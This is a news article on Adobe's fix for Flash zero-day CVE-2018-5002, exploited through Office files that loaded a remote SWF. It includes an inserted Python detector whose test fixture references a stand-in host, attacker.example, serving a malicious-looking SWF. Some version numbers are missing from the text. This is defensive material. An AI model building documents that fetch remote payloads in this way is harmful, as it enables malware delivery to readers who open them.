Adobe Patches Flash Zero-Day


Adobe has issued a security update for Flash Player today to patch a zero-day vulnerability exploited by attackers in the wild.

The vulnerability was discovered and independently reported by several security firms: ICEBRG, Tencent, and two security divisions of Chinese cyber-security giant Qihoo 360.

The vulnerability, tracked as CVE-2018-5002, impacts Adobe Flash Player and earlier versions. It was fixed with the release of Flash Player

Flash zero-day exploited via Office files

According to Qihoo 360 Core Security, attackers used the Flash zero-day for attacks against targets in the Middle East. It is believed that a nation-state-backed cyber-espionage group is behind the attacks.

“We boldly suspected that the targeted region is Doha, Qatar,” Qihoo 360 Core said today in a blog post detailing the zero-day.

Experts say the hackers used Office files to exploit this Flash zero-day. Attackers delivered Office files to victims that, when opened, loaded a malicious SWF file from a remote server and executed it inside the Office document.

Flash zero-day CVE-2018-5002

The malicious SWF file would exploit CVE-2018-5002 to gain the ability to execute code on the user’s PC, and later infect the victim with another strain of malware.
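The delivery chain described above (an Office document that pulls a SWF from a remote server) leaves a trace in the document itself: an OOXML relationship with an external target, and often the Flash ActiveX CLSID in an embedded part. The following detection helper is an added example, not code from the article or from any of the vendors it cites; the relationship layout and the sample document are constructed assumptions, not the real samples from this campaign.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespace used by OOXML relationship (.rels) parts.
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
# CLSID of the Shockwave Flash ActiveX control; its presence in an
# activeX/oleObject part means the document can instantiate Flash.
FLASH_CLSID = "D27CDB6E-AE6D-11CF-96B8-444553540000"

def find_remote_swf_refs(ooxml_bytes: bytes) -> list:
    """Return findings: every external relationship whose target looks like
    a remote SWF, plus any part that embeds the Flash CLSID."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(ooxml_bytes)) as z:
        for name in z.namelist():
            data = z.read(name)
            if name.endswith(".rels"):
                root = ET.fromstring(data)
                for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                    target = rel.get("Target", "")
                    if rel.get("TargetMode") == "External" and re.search(
                            r"^https?://.*\.swf(\?|$)", target, re.I):
                        findings.append({"part": name, "kind": "remote_swf",
                                         "target": target})
            elif FLASH_CLSID.encode() in data.upper():
                findings.append({"part": name, "kind": "flash_clsid",
                                 "target": None})
    return findings

def build_sample() -> bytes:
    """Constructed, benign .docx-like zip (assumed layout, not a real sample):
    one external relationship to a SWF and one activeX part with the Flash CLSID."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/_rels/document.xml.rels",
            f'<Relationships xmlns="{RELS_NS}">'
            '<Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"'
            ' Target="http://attacker.example/stage1.swf" TargetMode="External"/>'
            '<Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image"'
            ' Target="media/image1.png"/>'
            '</Relationships>')
        z.writestr("word/activeX/activeX1.xml", f'<ocx classid="{{{FLASH_CLSID}}}"/>')
    return buf.getvalue()

if __name__ == "__main__":
    for finding in find_remote_swf_refs(build_sample()):
        print(finding)
```

Either finding on its own is a reason to detonate the document in a sandbox rather than open it; an external SWF target is a strong signal because legitimate documents almost never fetch Flash content over the network.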

Zero-day attacks in the making for three months

“The attacker developed sophisticated plans in the cloud and spent at least three months preparing for the attack. The detailed phishing attack content was also tailored to the attack target,” Qihoo experts said. “All clues show this is a typical APT attack.”

“We suggest that all relevant organizations and users update their Flash to the latest versions in a timely manner.”

Besides CVE-2018-5002, today’s Adobe Flash update also contains fixes for three other vulnerabilities. Flash Player updates are available for Windows, Mac, Linux, and Chrome OS users.

Vulnerability Category        Vulnerability Impact      Severity   CVE Number
Type Confusion                Arbitrary Code Execution  Critical   CVE-2018-4945
Integer Overflow              Information Disclosure    Important  CVE-2018-5000
Out-of-bounds read            Information Disclosure    Important  CVE-2018-5001
Stack-based buffer overflow   Arbitrary Code Execution  Critical   CVE-2018-5002

This is the second Flash Player zero-day spotted this year. In January, North Korean hackers deployed a first Flash zero-day (CVE-2018-4878) against targets in South Korea.
